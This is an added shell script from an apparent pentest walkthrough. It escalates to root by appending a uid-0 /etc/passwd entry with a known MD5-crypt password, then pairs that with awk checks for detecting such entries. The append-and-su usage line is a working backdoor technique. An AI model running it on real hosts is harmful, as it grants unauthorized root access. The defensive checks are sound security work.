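The /etc/passwd write used for the escalation above, as an added example (not code from the original walkthrough) that wraps it in the checks a tester wants: confirm the file is actually writable first, build the uid-0 entry with the same openssl MD5-crypt call, and, from the verification or defender side, list every uid-0 account and every account whose password field carries a hash instead of "x". It assumes POSIX sh, awk and openssl(1); the passwd content it is tested against is constructed, with the web1 line and its hash taken from the transcript above.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.
# Assumes POSIX sh, awk and openssl(1).

# The trick only works if the current user can write /etc/passwd, which should
# never be the case (mode 0644, owner root). Test before relying on it.
passwd_writable() {
    f="${1:-/etc/passwd}"
    if [ -w "$f" ]; then echo writable; else echo not-writable; fi
}

# Build the line the walkthrough appends: MD5-crypt ($1$) hash in the password
# field, uid 0, gid 0, home /root, shell /bin/bash. Because the field is not
# "x", login uses this hash directly and /etc/shadow is never consulted.
root_passwd_entry() {
    user="$1"; password="$2"; salt="$3"
    hash=$(openssl passwd -1 -salt "$salt" "$password") || return 1
    printf '%s:%s:0:0::/root:/bin/bash\n' "$user" "$hash"
}

# Verification / detection: accounts with uid 0 other than root.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Verification / detection: accounts whose password field is neither "x"
# (hash lives in /etc/shadow) nor a lock marker ("*", "!", "!!"). A hash here,
# or an empty field, means the account authenticates straight out of /etc/passwd.
hash_in_passwd() {
    awk -F: '$2 !~ /^(x|\*|!+)$/ { print $1 }' "$1"
}

# Usage on a target, after confirming "writable":
#   passwd_writable
#   root_passwd_entry web1 123456 web1 >> /etc/passwd && su web1
# Usage as a defender / during cleanup:
#   extra_uid0_accounts /etc/passwd; hash_in_passwd /etc/passwd
```

The two awk checks are cheap enough to run from a cron job or a host-integrity rule; either one firing on a production box is a strong indicator of exactly this escalation.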

